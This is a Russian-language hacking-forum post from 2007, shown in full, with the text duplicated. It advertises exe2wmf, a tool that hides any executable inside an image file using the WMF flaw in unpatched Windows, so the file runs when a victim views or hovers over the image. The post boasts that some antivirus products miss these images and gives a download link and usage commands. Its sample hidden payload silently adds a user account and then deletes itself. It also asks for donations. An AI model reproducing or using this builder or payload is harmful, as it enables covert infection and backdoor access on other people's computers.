slesh
20.03.2007, 22:47
Уважаемые дамы и господа, даю вам на растерзание мою прогу.
Данная прога создает картинки в формате wmf к которым прикрепляется выбранная вами программа. Весь принцип работы основан на WMF баге. Тестирование проходило на не пропатченых системах: Windows XP SP1/SP2 и Windows 2003. При всех тестах показала отличную безглючную работу, т.е. визуальное отсутствие повреждения памяти процесса, который попытался просмотреть картинку т.е. без зависаний и окон с ошибками. Баг был устранен только в 2006 году. => Винда на установочных дисках вышедших до 2006 года является уязвимой, если не поставлен патч. Создаваемые картинки не палятся некоторыми антивирями.
Программу можно скачать тут: http://www.slesh.xost.ru/up.php?act=get&file=exe2wmf.zip
Если вам понравилась программа или вы хотите отблагодарить меня, то киньте кто сколько может на кошелек
WMZ: Z671833489051
или
WMR: R156568501269
БУДУ очень благодарен!!
Использование программы:
exe2wmf.exe show_param file_in file_out
Где:
show_param - параметр отображения прикрепленной программы при запуске.
1 - Показывать окно
0 - Не показывать окно
file_in - файл который прикрепляется к картинке. Прикреплять следует только исполняемые файлы
такие как *.exe *.com *.bat
file_out - выходной файл в котором будет находиться готовая картинка.
Для того чтобы запустился код в картинке файл должен иметь расширение: *.jpg *.gif *.bmp *.wmf
Или расширение любого Другова графического формата поддерживаемого ОС Windows
Принцип работы:
При клике по получаемой картинке или наведению на неё мышью, а в некоторых случаях при заходе
в папку где расположена картинка, запускается код помещенный в картинку. Этот код расшифровывает
свою вторую часть и прикрепленный файл, после чего сохраняет прикрепленный файл в системную
папку TEMP, после чего запускает сохраненную программу. Но это всё работает только на ОС на которых
не установлен патч. Или где файл GDI32.dll имеет дату создания не позднее ноября 2005 года.
Дополнительное описание:
Файлы создаваемые программой имеют примитивное шифрование. т.е. основная часть shell-code
и прикрепляемая программа шифруется. Также структура самого файла частично строится генератором
случайных чисел. Возможно, картинки будут вызывать подозрение у антивирусных программ.
Антивирус Dr. Web - вирус не обнаружен.
Антивирус Kaspersky - подозрение на вирус Exploit.Win32.IMG-WMF
Картинки тестировались на Windows XP SP2 и Windows 2003
Для каждой картинки имя файла который будет помещаться в папку temp будет генерироваться из 3-х
английских букв + расширение входного файла.
Пример использования:
1) exe2wmf.exe 1 c:\1.exe c:\2.bmp
Создаст на диске C: картинку 2.bmp в которую запихнет программу 1.exe находящуюся на диске C:
При запуске прикрепленной программы окно будет показываться.
2) exe2wmf.exe 0 c:\1.bat c:\2.bmp
Создаст на диске C: картинку - 2.bmp в которую запихнет пакетный файл 1.bat находящуюся на диске C:
При запуске пакетного файла окно не будет показываться.
В пакетный файл может выглядеть следующим образом:
net user myuser mypass /add
del %0
т.е. создаст пользователя myuser с паролем mypass и удалит сам себя.
Связь с автором программы:
ICQ: 266-334-734
E-mail: slesh-2000@yandex.ru
WMZ: Z671833489051
WMR: R156568501269
Данная прога создает картинки в формате wmf к которым прикрепляется выбранная вами программа. Весь принцип работы основан на WMF баге. Тестирование проходило на не пропатченых системах: Windows XP SP1/SP2 и Windows 2003. При всех тестах показала отличную безглючную работу, т.е. визуальное отсутствие повреждения памяти процесса, который попытался просмотреть картинку т.е. без зависаний и окон с ошибками. Баг был устранен только в 2006 году. => Винда на установочных дисках вышедших до 2006 года является уязвимой, если не поставлен патч. Создаваемые картинки не палятся некоторыми антивирями.
Программу можно скачать тут: http://www.slesh.xost.ru/up.php?act=get&file=exe2wmf.zip
Если вам понравилась программа или вы хотите отблагодарить меня, то киньте кто сколько может на кошелек
WMZ: Z671833489051
или
WMR: R156568501269
БУДУ очень благодарен!!
Использование программы:
exe2wmf.exe show_param file_in file_out
Где:
show_param - параметр отображения прикрепленной программы при запуске.
1 - Показывать окно
0 - Не показывать окно
file_in - файл который прикрепляется к картинке. Прикреплять следует только исполняемые файлы
такие как *.exe *.com *.bat
file_out - выходной файл в котором будет находиться готовая картинка.
Для того чтобы запустился код в картинке файл должен иметь расширение: *.jpg *.gif *.bmp *.wmf
Или расширение любого Другова графического формата поддерживаемого ОС Windows
Принцип работы:
При клике по получаемой картинке или наведению на неё мышью, а в некоторых случаях при заходе
в папку где расположена картинка, запускается код помещенный в картинку. Этот код расшифровывает
свою вторую часть и прикрепленный файл, после чего сохраняет прикрепленный файл в системную
папку TEMP, после чего запускает сохраненную программу. Но это всё работает только на ОС на которых
не установлен патч. Или где файл GDI32.dll имеет дату создания не позднее ноября 2005 года.
Дополнительное описание:
Файлы создаваемые программой имеют примитивное шифрование. т.е. основная часть shell-code
и прикрепляемая программа шифруется. Также структура самого файла частично строится генератором
случайных чисел. Возможно, картинки будут вызывать подозрение у антивирусных программ.
Антивирус Dr. Web - вирус не обнаружен.
Антивирус Kaspersky - подозрение на вирус Exploit.Win32.IMG-WMF
Картинки тестировались на Windows XP SP2 и Windows 2003
Для каждой картинки имя файла который будет помещаться в папку temp будет генерироваться из 3-х
английских букв + расширение входного файла.
Пример использования:
1) exe2wmf.exe 1 c:\1.exe c:\2.bmp
Создаст на диске C: картинку 2.bmp в которую запихнет программу 1.exe находящуюся на диске C:
При запуске прикрепленной программы окно будет показываться.
2) exe2wmf.exe 0 c:\1.bat c:\2.bmp
Создаст на диске C: картинку - 2.bmp в которую запихнет пакетный файл 1.bat находящуюся на диске C:
При запуске пакетного файла окно не будет показываться.
В пакетный файл может выглядеть следующим образом:
net user myuser mypass /add
del %0
т.е. создаст пользователя myuser с паролем mypass и удалит сам себя.
Связь с автором программы:
ICQ: 266-334-734
E-mail: slesh-2000@yandex.ru
WMZ: Z671833489051
WMR: R156568501269